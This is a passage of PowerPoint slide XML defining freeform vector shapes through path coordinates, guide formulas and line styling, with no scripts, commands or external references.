                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="25"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36265" name="Freeform 398"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2954" y="2109"/>
                <a:ext cx="93" cy="93"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 93"/>
                  <a:gd name="T1" fmla="*/ 69 h 93"/>
                  <a:gd name="T2" fmla="*/ 25 w 93"/>
                  <a:gd name="T3" fmla="*/ 52 h 93"/>
                  <a:gd name="T4" fmla="*/ 22 w 93"/>
                  <a:gd name="T5" fmla="*/ 41 h 93"/>
                  <a:gd name="T6" fmla="*/ 11 w 93"/>
                  <a:gd name="T7" fmla="*/ 33 h 93"/>
                  <a:gd name="T8" fmla="*/ 6 w 93"/>
                  <a:gd name="T9" fmla="*/ 40 h 93"/>
                  <a:gd name="T10" fmla="*/ 2 w 93"/>
                  <a:gd name="T11" fmla="*/ 25 h 93"/>
                  <a:gd name="T12" fmla="*/ 5 w 93"/>
                  <a:gd name="T13" fmla="*/ 24 h 93"/>
                  <a:gd name="T14" fmla="*/ 7 w 93"/>
                  <a:gd name="T15" fmla="*/ 24 h 93"/>
                  <a:gd name="T16" fmla="*/ 9 w 93"/>
                  <a:gd name="T17" fmla="*/ 24 h 93"/>
                  <a:gd name="T18" fmla="*/ 14 w 93"/>
                  <a:gd name="T19" fmla="*/ 24 h 93"/>
                  <a:gd name="T20" fmla="*/ 15 w 93"/>
                  <a:gd name="T21" fmla="*/ 22 h 93"/>
                  <a:gd name="T22" fmla="*/ 17 w 93"/>
                  <a:gd name="T23" fmla="*/ 20 h 93"/>
                  <a:gd name="T24" fmla="*/ 18 w 93"/>
                  <a:gd name="T25" fmla="*/ 22 h 93"/>
                  <a:gd name="T26" fmla="*/ 21 w 93"/>
                  <a:gd name="T27" fmla="*/ 24 h 93"/>
                  <a:gd name="T28" fmla="*/ 23 w 93"/>
                  <a:gd name="T29" fmla="*/ 24 h 93"/>
                  <a:gd name="T30" fmla="*/ 27 w 93"/>
                  <a:gd name="T31" fmla="*/ 25 h 93"/>
                  <a:gd name="T32" fmla="*/ 28 w 93"/>
                  <a:gd name="T33" fmla="*/ 22 h 93"/>
                  <a:gd name="T34" fmla="*/ 29 w 93"/>
                  <a:gd name="T35" fmla="*/ 20 h 93"/>
                  <a:gd name="T36" fmla="*/ 28 w 93"/>
                  <a:gd name="T37" fmla="*/ 18 h 93"/>
                  <a:gd name="T38" fmla="*/ 31 w 93"/>
                  <a:gd name="T39" fmla="*/ 16 h 93"/>
                  <a:gd name="T40" fmla="*/ 34 w 93"/>
                  <a:gd name="T41" fmla="*/ 15 h 93"/>
                  <a:gd name="T42" fmla="*/ 34 w 93"/>
                  <a:gd name="T43" fmla="*/ 11 h 93"/>
                  <a:gd name="T44" fmla="*/ 33 w 93"/>
                  <a:gd name="T45" fmla="*/ 8 h 93"/>
                  <a:gd name="T46" fmla="*/ 37 w 93"/>
                  <a:gd name="T47" fmla="*/ 6 h 93"/>
                  <a:gd name="T48" fmla="*/ 41 w 93"/>
                  <a:gd name="T49" fmla="*/ 4 h 93"/>
                  <a:gd name="T50" fmla="*/ 43 w 93"/>
                  <a:gd name="T51" fmla="*/ 3 h 93"/>
                  <a:gd name="T52" fmla="*/ 46 w 93"/>
                  <a:gd name="T53" fmla="*/ 0 h 93"/>
                  <a:gd name="T54" fmla="*/ 59 w 93"/>
                  <a:gd name="T55" fmla="*/ 10 h 93"/>
                  <a:gd name="T56" fmla="*/ 84 w 93"/>
                  <a:gd name="T57" fmla="*/ 15 h 93"/>
                  <a:gd name="T58" fmla="*/ 86 w 93"/>
                  <a:gd name="T59" fmla="*/ 19 h 93"/>
                  <a:gd name="T60" fmla="*/ 87 w 93"/>
                  <a:gd name="T61" fmla="*/ 23 h 93"/>
                  <a:gd name="T62" fmla="*/ 87 w 93"/>
                  <a:gd name="T63" fmla="*/ 24 h 93"/>
                  <a:gd name="T64" fmla="*/ 88 w 93"/>
                  <a:gd name="T65" fmla="*/ 27 h 93"/>
                  <a:gd name="T66" fmla="*/ 91 w 93"/>
                  <a:gd name="T67" fmla="*/ 30 h 93"/>
                  <a:gd name="T68" fmla="*/ 92 w 93"/>
                  <a:gd name="T69" fmla="*/ 31 h 93"/>
                  <a:gd name="T70" fmla="*/ 89 w 93"/>
                  <a:gd name="T71" fmla="*/ 30 h 93"/>
                  <a:gd name="T72" fmla="*/ 88 w 93"/>
                  <a:gd name="T73" fmla="*/ 33 h 93"/>
                  <a:gd name="T74" fmla="*/ 88 w 93"/>
                  <a:gd name="T75" fmla="*/ 37 h 93"/>
                  <a:gd name="T76" fmla="*/ 85 w 93"/>
                  <a:gd name="T77" fmla="*/ 38 h 93"/>
                  <a:gd name="T78" fmla="*/ 82 w 93"/>
                  <a:gd name="T79" fmla="*/ 35 h 93"/>
                  <a:gd name="T80" fmla="*/ 78 w 93"/>
                  <a:gd name="T81" fmla="*/ 34 h 93"/>
                  <a:gd name="T82" fmla="*/ 74 w 93"/>
                  <a:gd name="T83" fmla="*/ 33 h 93"/>
                  <a:gd name="T84" fmla="*/ 70 w 93"/>
                  <a:gd name="T85" fmla="*/ 33 h 93"/>
                  <a:gd name="T86" fmla="*/ 63 w 93"/>
                  <a:gd name="T87" fmla="*/ 32 h 93"/>
                  <a:gd name="T88" fmla="*/ 58 w 93"/>
                  <a:gd name="T89" fmla="*/ 32 h 93"/>
                  <a:gd name="T90" fmla="*/ 53 w 93"/>
                  <a:gd name="T91" fmla="*/ 29 h 93"/>
                  <a:gd name="T92" fmla="*/ 47 w 93"/>
                  <a:gd name="T93" fmla="*/ 30 h 93"/>
                  <a:gd name="T94" fmla="*/ 41 w 93"/>
                  <a:gd name="T95" fmla="*/ 33 h 93"/>
                  <a:gd name="T96" fmla="*/ 36 w 93"/>
                  <a:gd name="T97" fmla="*/ 32 h 93"/>
                  <a:gd name="T98" fmla="*/ 35 w 93"/>
                  <a:gd name="T99" fmla="*/ 39 h 93"/>
                  <a:gd name="T100" fmla="*/ 38 w 93"/>
                  <a:gd name="T101" fmla="*/ 42 h 93"/>
                  <a:gd name="T102" fmla="*/ 42 w 93"/>
                  <a:gd name="T103" fmla="*/ 50 h 93"/>
                  <a:gd name="T104" fmla="*/ 44 w 93"/>
                  <a:gd name="T105" fmla="*/ 54 h 93"/>
                  <a:gd name="T106" fmla="*/ 50 w 93"/>
                  <a:gd name="T107" fmla="*/ 60 h 93"/>
                  <a:gd name="T108" fmla="*/ 57 w 93"/>
                  <a:gd name="T109" fmla="*/ 68 h 93"/>
                  <a:gd name="T110" fmla="*/ 61 w 93"/>
                  <a:gd name="T111" fmla="*/ 74 h 93"/>
                  <a:gd name="T112" fmla="*/ 63 w 93"/>
                  <a:gd name="T113" fmla="*/ 81 h 93"/>
                  <a:gd name="T114" fmla="*/ 68 w 93"/>
                  <a:gd name="T115" fmla="*/ 82 h 93"/>
                  <a:gd name="T116" fmla="*/ 75 w 93"/>
                  <a:gd name="T117" fmla="*/ 87 h 93"/>
                  <a:gd name="T118" fmla="*/ 78 w 93"/>
                  <a:gd name="T119" fmla="*/ 88 h 93"/>
                  <a:gd name="T120" fmla="*/ 79 w 93"/>
                  <a:gd name="T121" fmla="*/ 92 h 93"/>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93"/>
                  <a:gd name="T184" fmla="*/ 0 h 93"/>
                  <a:gd name="T185" fmla="*/ 93 w 93"/>
                  <a:gd name="T186" fmla="*/ 93 h 93"/>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93" h="93">
                    <a:moveTo>
                      <a:pt x="63" y="81"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="56" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="81"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="65" y="82"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="66" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="87"/>
                    </a:lnTo>
